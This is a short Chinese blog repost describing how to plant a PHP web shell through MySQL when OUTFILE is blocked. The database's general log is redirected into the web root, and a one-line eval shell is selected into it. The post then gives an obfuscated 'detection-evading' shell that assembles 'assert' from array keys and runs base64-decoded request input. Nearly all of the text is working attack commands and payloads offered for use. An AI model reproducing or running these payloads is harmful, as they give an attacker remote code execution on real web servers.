Python

SQL语句用日志写shell

字号+ 作者:科拉实验室 来源:转载 2017-04-18 08:54 我要评论( )

outfile被禁止,或者写入文件被拦截; 在数据库中操作如下:(必须是root权限) show variables like %general%; #查看配置 set global general_log = on; #开启ge......

outfile被禁止,或者写入文件被拦截;
在数据库中操作如下:(必须是root权限)
show variables like '%general%';  #查看配置
set global general_log = on;  #开启general log模式
set global general_log_file = '/var/www/html/1.php';   #设置日志目录为shell地址
select '<?php eval($_POST[cmd]);?>'  #写入shell
SQL查询免杀shell的语句
SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"
转 科拉实验室。。无聊吗


本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Python/627.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~